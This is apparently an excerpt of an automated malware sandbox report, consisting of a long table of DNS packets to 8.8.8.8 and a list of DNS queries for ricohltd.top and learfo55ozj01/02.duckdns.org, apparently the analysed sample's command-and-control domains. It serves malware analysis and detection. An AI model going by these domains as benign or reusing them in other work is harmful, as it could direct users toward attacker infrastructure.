                                              May 1, 2024 18:22:57.503211975 CEST6098153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:57.597862005 CEST53609818.8.8.8192.168.2.22
                                              May 1, 2024 18:22:57.598020077 CEST6098153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:57.692558050 CEST53609818.8.8.8192.168.2.22
                                              May 1, 2024 18:22:57.692734957 CEST6098153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:57.786983013 CEST53609818.8.8.8192.168.2.22
                                              May 1, 2024 18:22:57.791253090 CEST6098153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:57.885893106 CEST53609818.8.8.8192.168.2.22
                                              May 1, 2024 18:22:58.923945904 CEST5116153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.019301891 CEST53511618.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.019566059 CEST5116153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.114458084 CEST53511618.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.114733934 CEST5116153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.209803104 CEST53511618.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.221467972 CEST5116153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.316539049 CEST53511618.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.316755056 CEST5116153192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.411839962 CEST53511618.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.435328960 CEST5035753192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.529880047 CEST53503578.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.530088902 CEST5035753192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.624274969 CEST53503578.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.625719070 CEST5035753192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.720175982 CEST53503578.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.721589088 CEST5035753192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.816102028 CEST53503578.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.819293022 CEST5035753192.168.2.228.8.8.8
                                              May 1, 2024 18:22:59.913434982 CEST53503578.8.8.8192.168.2.22
                                              May 1, 2024 18:22:59.929601908 CEST5829153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:00.024559975 CEST53582918.8.8.8192.168.2.22
                                              May 1, 2024 18:23:00.024713993 CEST5829153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:00.119709015 CEST53582918.8.8.8192.168.2.22
                                              May 1, 2024 18:23:00.119863033 CEST5829153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:00.214159966 CEST53582918.8.8.8192.168.2.22
                                              May 1, 2024 18:23:00.214356899 CEST5829153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:00.310233116 CEST53582918.8.8.8192.168.2.22
                                              May 1, 2024 18:23:00.310405970 CEST5829153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:00.405514002 CEST53582918.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.083590031 CEST6476253192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.178056955 CEST53647628.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.178329945 CEST6476253192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.272454977 CEST53647628.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.272712946 CEST6476253192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.367062092 CEST53647628.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.367305994 CEST6476253192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.461785078 CEST53647628.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.462238073 CEST6476253192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.556333065 CEST53647628.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.567436934 CEST5306353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.661776066 CEST53530638.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.662013054 CEST5306353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.756064892 CEST53530638.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.756330967 CEST5306353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.851047039 CEST53530638.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.851262093 CEST5306353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:05.945348978 CEST53530638.8.8.8192.168.2.22
                                              May 1, 2024 18:23:05.945580006 CEST5306353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.039629936 CEST53530638.8.8.8192.168.2.22
                                              May 1, 2024 18:23:06.050112009 CEST6033353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.144368887 CEST53603338.8.8.8192.168.2.22
                                              May 1, 2024 18:23:06.147231102 CEST6033353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.241518021 CEST53603338.8.8.8192.168.2.22
                                              May 1, 2024 18:23:06.247243881 CEST6033353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.341957092 CEST53603338.8.8.8192.168.2.22
                                              May 1, 2024 18:23:06.343262911 CEST6033353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.439994097 CEST53603338.8.8.8192.168.2.22
                                              May 1, 2024 18:23:06.442270994 CEST6033353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:06.536464930 CEST53603338.8.8.8192.168.2.22
                                              May 1, 2024 18:23:08.993493080 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:09.105372906 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:09.105727911 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:09.199976921 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:09.200263023 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:09.298685074 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:09.298962116 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:09.393147945 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:09.420037985 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:09.514738083 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:10.218755960 CEST5624353192.168.2.228.8.8.8
                                              May 1, 2024 18:23:10.312961102 CEST53562438.8.8.8192.168.2.22
                                              May 1, 2024 18:23:10.733387947 CEST6268953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:10.828043938 CEST53626898.8.8.8192.168.2.22
                                              May 1, 2024 18:23:10.828233004 CEST6268953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:10.922765970 CEST53626898.8.8.8192.168.2.22
                                              May 1, 2024 18:23:10.922938108 CEST6268953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:11.017503023 CEST53626898.8.8.8192.168.2.22
                                              May 1, 2024 18:23:11.017905951 CEST6268953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:11.112143040 CEST53626898.8.8.8192.168.2.22
                                              May 1, 2024 18:23:11.119092941 CEST6268953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:11.215830088 CEST53626898.8.8.8192.168.2.22
                                              May 1, 2024 18:23:12.362782955 CEST4933953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:12.476068974 CEST53493398.8.8.8192.168.2.22
                                              May 1, 2024 18:23:12.476284027 CEST4933953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:12.571408987 CEST53493398.8.8.8192.168.2.22
                                              May 1, 2024 18:23:12.574835062 CEST4933953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:12.669987917 CEST53493398.8.8.8192.168.2.22
                                              May 1, 2024 18:23:12.687738895 CEST4933953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:12.783092976 CEST53493398.8.8.8192.168.2.22
                                              May 1, 2024 18:23:12.951582909 CEST4933953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:13.046169043 CEST53493398.8.8.8192.168.2.22
                                              May 1, 2024 18:23:16.644519091 CEST6213153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:16.740035057 CEST53621318.8.8.8192.168.2.22
                                              May 1, 2024 18:23:16.740267038 CEST6213153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:16.835520983 CEST53621318.8.8.8192.168.2.22
                                              May 1, 2024 18:23:16.839495897 CEST6213153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:16.934690952 CEST53621318.8.8.8192.168.2.22
                                              May 1, 2024 18:23:16.934931993 CEST6213153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.030270100 CEST53621318.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.030488968 CEST6213153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.125211000 CEST53621318.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.136998892 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.231348991 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.231513977 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.325886965 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.329366922 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.423676014 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.425553083 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.520143986 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:17.522459030 CEST6303653192.168.2.228.8.8.8
                                              May 1, 2024 18:23:17.617027044 CEST53630368.8.8.8192.168.2.22
                                              May 1, 2024 18:23:18.642189026 CEST6353553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:18.736934900 CEST53635358.8.8.8192.168.2.22
                                              May 1, 2024 18:23:18.737210989 CEST6353553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:18.831818104 CEST53635358.8.8.8192.168.2.22
                                              May 1, 2024 18:23:18.832145929 CEST6353553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:18.926796913 CEST53635358.8.8.8192.168.2.22
                                              May 1, 2024 18:23:18.927398920 CEST6353553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.022181988 CEST53635358.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.023443937 CEST6353553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.117746115 CEST53635358.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.128278017 CEST5521953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.223251104 CEST53552198.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.223498106 CEST5521953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.317845106 CEST53552198.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.318104982 CEST5521953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.412731886 CEST53552198.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.412940025 CEST5521953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.507664919 CEST53552198.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.507874966 CEST5521953192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.617893934 CEST53552198.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.631625891 CEST6022853192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.726191044 CEST53602288.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.727283955 CEST6022853192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.822231054 CEST53602288.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.822412014 CEST6022853192.168.2.228.8.8.8
                                              May 1, 2024 18:23:19.916877985 CEST53602288.8.8.8192.168.2.22
                                              May 1, 2024 18:23:19.924750090 CEST6022853192.168.2.228.8.8.8
                                              May 1, 2024 18:23:20.019217968 CEST53602288.8.8.8192.168.2.22
                                              May 1, 2024 18:23:20.023053885 CEST6022853192.168.2.228.8.8.8
                                              May 1, 2024 18:23:20.117466927 CEST53602288.8.8.8192.168.2.22
                                              May 1, 2024 18:23:22.912683964 CEST5867153192.168.2.228.8.8.8
                                              May 1, 2024 18:23:23.006800890 CEST53586718.8.8.8192.168.2.22
                                              May 1, 2024 18:23:23.551987886 CEST5641553192.168.2.228.8.8.8
                                              May 1, 2024 18:23:23.646436930 CEST53564158.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 1, 2024 18:20:41.248637915 CEST192.168.2.228.8.8.80x6bc6Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:43.660891056 CEST192.168.2.228.8.8.80xa811Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:45.618702888 CEST192.168.2.228.8.8.80x5a61Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:46.214162111 CEST192.168.2.228.8.8.80x926Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:47.349608898 CEST192.168.2.228.8.8.80x3c88Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:48.044560909 CEST192.168.2.228.8.8.80xb917Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:48.755565882 CEST192.168.2.228.8.8.80xf356Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:50.797612906 CEST192.168.2.228.8.8.80xbaf4Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:52.129909992 CEST192.168.2.228.8.8.80x8554Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:53.203670979 CEST192.168.2.228.8.8.80xf3dbStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:57.510685921 CEST192.168.2.228.8.8.80x82a1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:59.455323935 CEST192.168.2.228.8.8.80xdaa0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:20:59.982223988 CEST192.168.2.228.8.8.80xdc3eStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:01.534106970 CEST192.168.2.228.8.8.80x8e67Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:05.173047066 CEST192.168.2.228.8.8.80xfe4Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:05.718477964 CEST192.168.2.228.8.8.80x8e4aStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:06.863914013 CEST192.168.2.228.8.8.80x9bc3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:07.514209986 CEST192.168.2.228.8.8.80x3b6dStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:08.504962921 CEST192.168.2.228.8.8.80xeb60Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:13.348938942 CEST192.168.2.228.8.8.80x4da1Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:14.237869978 CEST192.168.2.228.8.8.80xe616Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:14.946079969 CEST192.168.2.228.8.8.80xcddaStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:16.142293930 CEST192.168.2.228.8.8.80xcd33Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:18.512571096 CEST192.168.2.228.8.8.80x824Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:19.719593048 CEST192.168.2.228.8.8.80xc36fStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:20.899189949 CEST192.168.2.228.8.8.80x2a2aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:21.625782013 CEST192.168.2.228.8.8.80x3ec0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:22.219018936 CEST192.168.2.228.8.8.80xa135Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:23.501049995 CEST192.168.2.228.8.8.80xfa11Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:24.261049032 CEST192.168.2.228.8.8.80x9408Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:25.127815962 CEST192.168.2.228.8.8.80x6b16Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:27.187902927 CEST192.168.2.228.8.8.80xaf81Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:28.184928894 CEST192.168.2.228.8.8.80xa7f7Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:28.913119078 CEST192.168.2.228.8.8.80x2622Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:30.165396929 CEST192.168.2.228.8.8.80x4f21Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:30.878798962 CEST192.168.2.228.8.8.80x8564Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:31.455076933 CEST192.168.2.228.8.8.80x6e3eStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:32.661166906 CEST192.168.2.228.8.8.80xb4c3Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:33.332684040 CEST192.168.2.228.8.8.80x5c79Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:33.904930115 CEST192.168.2.228.8.8.80xe4bcStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:34.017117023 CEST192.168.2.228.8.8.80xe4bcStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:35.189076900 CEST192.168.2.228.8.8.80xfaabStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:35.953577042 CEST192.168.2.228.8.8.80x9d52Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:36.664850950 CEST192.168.2.228.8.8.80xaf03Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.106295109 CEST192.168.2.228.8.8.80xc6c8Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.773658991 CEST192.168.2.228.8.8.80xf123Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:38.869077921 CEST192.168.2.228.8.8.80xf123Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:39.478163958 CEST192.168.2.228.8.8.80xa88Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:40.681109905 CEST192.168.2.228.8.8.80x6a7fStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:41.455945969 CEST192.168.2.228.8.8.80x985bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:42.161959887 CEST192.168.2.228.8.8.80x861cStandard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:43.344773054 CEST192.168.2.228.8.8.80x2535Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:43.440262079 CEST192.168.2.228.8.8.80x2535Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:44.296161890 CEST192.168.2.228.8.8.80xf98bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:44.939502001 CEST192.168.2.228.8.8.80x3e71Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:46.150847912 CEST192.168.2.228.8.8.80x2b92Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:46.745203018 CEST192.168.2.228.8.8.80xb9b0Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:47.695950031 CEST192.168.2.228.8.8.80xcd88Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:48.900747061 CEST192.168.2.228.8.8.80xa656Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:49.872941971 CEST192.168.2.228.8.8.80xcc8aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:49.967705011 CEST192.168.2.228.8.8.80xcc8aStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:50.647994041 CEST192.168.2.228.8.8.80x5044Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.068430901 CEST192.168.2.228.8.8.80x90bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.163217068 CEST192.168.2.228.8.8.80x90bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.258079052 CEST192.168.2.228.8.8.80x90bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:52.371099949 CEST192.168.2.228.8.8.80x90bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.489027023 CEST192.168.2.228.8.8.80xb3aeStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.584016085 CEST192.168.2.228.8.8.80xb3aeStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.694343090 CEST192.168.2.228.8.8.80xb3aeStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.789186954 CEST192.168.2.228.8.8.80xb3aeStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:53.883711100 CEST192.168.2.228.8.8.80xb3aeStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.563309908 CEST192.168.2.228.8.8.80x7d0eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.661484003 CEST192.168.2.228.8.8.80x7d0eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.773660898 CEST192.168.2.228.8.8.80x7d0eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.868518114 CEST192.168.2.228.8.8.80x7d0eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:21:55.964004993 CEST192.168.2.228.8.8.80x7d0eStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.034470081 CEST192.168.2.228.8.8.80x736bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.129359961 CEST192.168.2.228.8.8.80x736bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.223741055 CEST192.168.2.228.8.8.80x736bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.318428040 CEST192.168.2.228.8.8.80x736bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:00.413233042 CEST192.168.2.228.8.8.80x736bStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.094655037 CEST192.168.2.228.8.8.80x2d06Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.207086086 CEST192.168.2.228.8.8.80x2d06Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.305366039 CEST192.168.2.228.8.8.80x2d06Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:01.423333883 CEST192.168.2.228.8.8.80x2d06Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.584129095 CEST192.168.2.228.8.8.80x6ec5Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.683722019 CEST192.168.2.228.8.8.80x6ec5Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.779084921 CEST192.168.2.228.8.8.80x6ec5Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:02.874392033 CEST192.168.2.228.8.8.80x6ec5Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.606164932 CEST192.168.2.228.8.8.80x8febStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.702109098 CEST192.168.2.228.8.8.80x8febStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.799102068 CEST192.168.2.228.8.8.80x8febStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.894555092 CEST192.168.2.228.8.8.80x8febStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:07.993817091 CEST192.168.2.228.8.8.80x8febStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.189425945 CEST192.168.2.228.8.8.80xb346Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.284791946 CEST192.168.2.228.8.8.80xb346Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.380001068 CEST192.168.2.228.8.8.80xb346Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.475156069 CEST192.168.2.228.8.8.80xb346Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:08.570441008 CEST192.168.2.228.8.8.80xb346Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:09.966001034 CEST192.168.2.228.8.8.80x2679Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.063260078 CEST192.168.2.228.8.8.80x2679Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.158267975 CEST192.168.2.228.8.8.80x2679Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.258152962 CEST192.168.2.228.8.8.80x2679Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.352945089 CEST192.168.2.228.8.8.80x2679Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.457840919 CEST192.168.2.228.8.8.80x6989Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.552289009 CEST192.168.2.228.8.8.80x6989Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.646753073 CEST192.168.2.228.8.8.80x6989Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                              May 1, 2024 18:22:10.741548061 CEST192.168.2.228.8.8.80x6989Standard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
